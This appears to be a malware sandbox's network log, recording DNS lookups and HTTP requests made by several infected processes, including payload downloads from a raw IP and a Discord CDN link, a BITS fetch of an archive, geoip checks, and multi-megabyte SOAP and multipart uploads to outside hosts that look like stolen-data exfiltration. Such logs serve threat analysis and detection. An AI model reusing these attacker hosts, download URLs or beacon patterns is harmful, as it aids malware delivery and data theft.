Date: Wed, 05 May 2021 17:37:16 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: stel_ssid=b37dd5b9aa4ca8e692_8473921438630034290; expires=Thu, 06 May 2021 17:37:16 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
Strict-Transport-Security: max-age=35768000
Access-Control-Allow-Origin: *
POST

http://35.228.62.50/

5229.exe

Remote address:

35.228.62.50:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Content-Length: 128
Host: 35.228.62.50

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:17 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
GET

http://35.228.62.50//l/f/Nj6aPXkBuI_ccNKo-Ozn/c3446adb963fb639861d98dafb7a71a683c3d35b

5229.exe

Remote address:

35.228.62.50:80

Request

GET //l/f/Nj6aPXkBuI_ccNKo-Ozn/c3446adb963fb639861d98dafb7a71a683c3d35b HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 35.228.62.50

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:17 GMT
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Last-Modified: Thu, 11 Feb 2021 18:55:17 GMT
ETag: "60257d95-dfcff"
Accept-Ranges: bytes
GET

http://35.228.62.50//l/f/Nj6aPXkBuI_ccNKo-Ozn/fa793fc1cf3c6da1e38fa6899404edcec25dbb0c

5229.exe

Remote address:

35.228.62.50:80

Request

GET //l/f/Nj6aPXkBuI_ccNKo-Ozn/fa793fc1cf3c6da1e38fa6899404edcec25dbb0c HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 35.228.62.50

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:18 GMT
Content-Type: application/octet-stream
Content-Length: 2828315
Connection: keep-alive
Last-Modified: Thu, 11 Feb 2021 18:55:16 GMT
ETag: "60257d94-2b281b"
Accept-Ranges: bytes
POST

http://35.228.62.50/

5229.exe

Remote address:

35.228.62.50:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=fQ2iY0qI4sL4iB1dG6aM1wQ5vV6a
Content-Length: 2662359
Host: 35.228.62.50

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:21 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
POST

http://109.234.34.165:14328//

3140.exe

Remote address:

109.234.34.165:14328

Request

POST // HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 109.234.34.165:14328
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 4581
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 05 May 2021 17:37:21 GMT
POST

http://109.234.34.165:14328//

3140.exe

Remote address:

109.234.34.165:14328

Request

POST // HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
Host: 109.234.34.165:14328
Content-Length: 433464
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 150
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 05 May 2021 17:39:00 GMT
POST

http://109.234.34.165:14328//

3140.exe

Remote address:

109.234.34.165:14328

Request

POST // HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 109.234.34.165:14328
Content-Length: 433450
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 05 May 2021 17:39:00 GMT
DNS

api.ip.sb

powershell.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172
GET

https://api.ip.sb/geoip

3140.exe

Remote address:

104.26.12.31:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:37:22 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Set-Cookie: __cfduid=dcc4e17b51d27bc28a5ddf595f666aff11620236241; expires=Fri, 04-Jun-21 17:37:21 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 09df3423570000bf0a679e8000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ldIEi5hfsCM5IyRNPe03RfDO5dt2RS8GEoF9Drn61WViBfIsHAyrGgcTflEirrvTVFY%2B7LlQT2%2Bi1aGR3pWeOCJfQd5zYNT%2B53I%3D"}]}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 64abbc7efff3bf0a-FRA
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
GET

https://cdn.discordapp.com/attachments/838444655414476836/839245681696440360/clao.exe

5229.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/838444655414476836/839245681696440360/clao.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cdn.discordapp.com

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:37:22 GMT
Content-Type: application/x-msdos-program
Content-Length: 1863600
Connection: keep-alive
Set-Cookie: __cfduid=debd287ff170807949bfd6647b66bdbb91620236242; expires=Fri, 04-Jun-21 17:37:22 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 64abbc84381cfa48-AMS
Accept-Ranges: bytes
Age: 74035
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=clao.exe
ETag: "86c55dc3d2c585bdd9c834571de6c39a"
Expires: Thu, 05 May 2022 17:37:22 GMT
Last-Modified: Tue, 04 May 2021 21:02:43 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 09df34269e0000fa4866a18000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1620162163023471
x-goog-hash: crc32c=SGd8sw==
x-goog-hash: md5=hsVdw9LFhb3ZyDRXHebDmg==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 1863600
X-GUploader-UploadID: ABg5-UwkX03Ftj2qHMqm7q43j7FPTL9Iaft3pAaqx1tD446e_UJnSvQzJJdGukAnnf8LzXZFzZTyzXgarR2wmHM13EFj3JyhdQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Ver4zm9bu%2Fs1v3WyjsVkxQs4XKnAXV9vcLOrSimivKiCTteg8r%2FRth1L%2FAI%2FoOtFxcLs2SYrKK1Skj%2FLJDVtm5Z%2FgX6trx3PvLeQ%2FQtI%2FU4b118%3D"}],"max_age":604800,"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
POST

http://reportyuwt4sbackv97qarke3.com/sCTMqVJusfff2DEP/eYzrrbN8esV7bvgC

SHyqaefepynae.exe

Remote address:

162.0.220.187:80

Request

POST /sCTMqVJusfff2DEP/eYzrrbN8esV7bvgC HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: reportyuwt4sbackv97qarke3.com
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.20.0
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 52
Date: Wed, 05 May 2021 17:38:26 GMT
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=7180-8439
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:38:27 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 1260
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:38:32 GMT
Content-Range: bytes 7180-8439/1433368
Content-Type: application/x-7z-compressed
Age: 0
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=8440-9039
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:39:00 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 600
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:39:05 GMT
Content-Range: bytes 8440-9039/1433368
Content-Type: application/x-7z-compressed
Age: 0
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=9040-10448
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:39:01 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 1409
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:39:06 GMT
Content-Range: bytes 9040-10448/1433368
Content-Type: application/x-7z-compressed
Age: 0
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=10449-13866
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:39:02 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 3418
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:39:07 GMT
Content-Range: bytes 10449-13866/1433368
Content-Type: application/x-7z-compressed
Age: 0
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=13867-16725
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:39:03 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 2859
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:39:08 GMT
Content-Range: bytes 13867-16725/1433368
Content-Type: application/x-7z-compressed
Age: 0
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=16726-23862
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:39:04 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 7137
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:39:09 GMT
Content-Range: bytes 16726-23862/1433368
Content-Type: application/x-7z-compressed
Age: 0
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=23863-37911
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:39:05 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 14049
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:39:10 GMT
Content-Range: bytes 23863-37911/1433368
Content-Type: application/x-7z-compressed
Age: 0
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=37912-65566
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:39:06 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 27655
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:39:11 GMT
Content-Range: bytes 37912-65566/1433368
Content-Type: application/x-7z-compressed
Age: 0
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=65567-139694
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:39:07 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 74128
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:39:12 GMT
Content-Range: bytes 65567-139694/1433368
Content-Type: application/x-7z-compressed
Age: 0
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=139695-276966
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:39:08 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 137272
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:39:13 GMT
Content-Range: bytes 139695-276966/1433368
Content-Type: application/x-7z-compressed
Age: 0
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=276967-543255
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:39:09 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 266289
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:39:14 GMT
Content-Range: bytes 276967-543255/1433368
Content-Type: application/x-7z-compressed
Age: 0
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=543256-984169
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:39:09 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 440914
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:39:14 GMT
Content-Range: bytes 543256-984169/1433368
Content-Type: application/x-7z-compressed
Age: 0
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=984170-1421800
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:39:11 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 437631
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:39:16 GMT
Content-Range: bytes 984170-1421800/1433368
Content-Type: application/x-7z-compressed
Age: 0
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=1421801-1433367
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:39:12 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 11567
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:39:17 GMT
Content-Range: bytes 1421801-1433367/1433368
Content-Type: application/x-7z-compressed
Age: 0
DNS

ddueevi.xyz

Remote address:

8.8.8.8:53

Request

ddueevi.xyz

IN A

Response

ddueevi.xyz

IN A

193.110.3.139
POST

http://ddueevi.xyz//

RegAsm.exe

Remote address:

193.110.3.139:80

Request

POST // HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: ddueevi.xyz
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:39:05 GMT
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
Content-Encoding: gzip
POST

http://ddueevi.xyz//

RegAsm.exe

Remote address:

193.110.3.139:80

Request

POST // HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
Host: ddueevi.xyz
Content-Length: 3105170
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:39:14 GMT
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
Content-Encoding: gzip
POST

http://ddueevi.xyz//

RegAsm.exe

Remote address:

193.110.3.139:80

Request

POST // HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: ddueevi.xyz
Content-Length: 3105156
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:39:22 GMT
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
Content-Encoding: gzip
GET

https://api.ip.sb/geoip

RegAsm.exe

Remote address:

104.26.12.31:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:39:06 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Set-Cookie: __cfduid=db432565afde7f72b2cb4a02bd313fd8b1620236345; expires=Fri, 04-Jun-21 17:39:05 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 09df35b7ea00004181c330c000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=uDCc6hG7IzOABRCQSurGlp7%2Bwqg5rmek%2F8kA0PMdRBzyTw7ZNwlBMipnaNksZ%2BY6GJpKLwOjvu6jJ%2F5Ei3k1oLAGHFMas0i573c%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 64abbf063e1d4181-HAM
DNS

rzGhpbucEOETlljXeAnIzH.rzGhpbucEOETlljXeAnIzH

Mutato.exe.com

Remote address:

8.8.8.8:53

Request

rzGhpbucEOETlljXeAnIzH.rzGhpbucEOETlljXeAnIzH

IN A

Response
DNS

fairsence.com

SunLabsPlayer.exe

Remote address:

8.8.8.8:53

Request

fairsence.com

IN A

Response

fairsence.com

IN A

71.19.146.79
GET

http://fairsence.com/campaign/?type=reg&source=campaign4&pinf1=cmd.exe&pinf2=C:\Windows\System32\cmd.exe

SunLabsPlayer.exe

Remote address:

71.19.146.79:80

Request

GET /campaign/?type=reg&source=campaign4&pinf1=cmd.exe&pinf2=C:\Windows\System32\cmd.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: fairsence.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:39:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://193.0.61.155:10790//

RegAsm.exe

Remote address:

193.0.61.155:10790

Request

POST // HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 193.0.61.155:10790
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 4656
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 05 May 2021 17:40:02 GMT
POST

http://193.0.61.155:10790//

RegAsm.exe

Remote address:

193.0.61.155:10790

Request

POST // HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
Host: 193.0.61.155:10790
Content-Length: 3104737
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 150
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 05 May 2021 17:40:08 GMT
POST

http://193.0.61.155:10790//

RegAsm.exe

Remote address:

193.0.61.155:10790

Request

POST // HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 193.0.61.155:10790
Content-Length: 3104723
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 05 May 2021 17:40:10 GMT
DNS

api.ip.sb

powershell.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172
GET

https://api.ip.sb/geoip

RegAsm.exe

Remote address:

104.26.12.31:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:40:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Set-Cookie: __cfduid=d6c1dcf91e1c0b550b5c9f4e1200f2b6d1620236402; expires=Fri, 04-Jun-21 17:40:02 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 09df36988800004156b5814000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Z1YGg6QS5Vp6dxznK7S%2FIaEpdm9ksjUQX4FnNaN4muquXa6wjUOpXRFIMfZcC5UIIsHzZh%2F76V9KoaIVjNXFcXW60y%2BIxBecuW8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 64abc06da8104156-HAM
DNS

www.facebook.com

huesaa.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

31.13.64.35
GET

https://www.facebook.com/

gpooe.exe

Remote address:

31.13.64.35:443

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
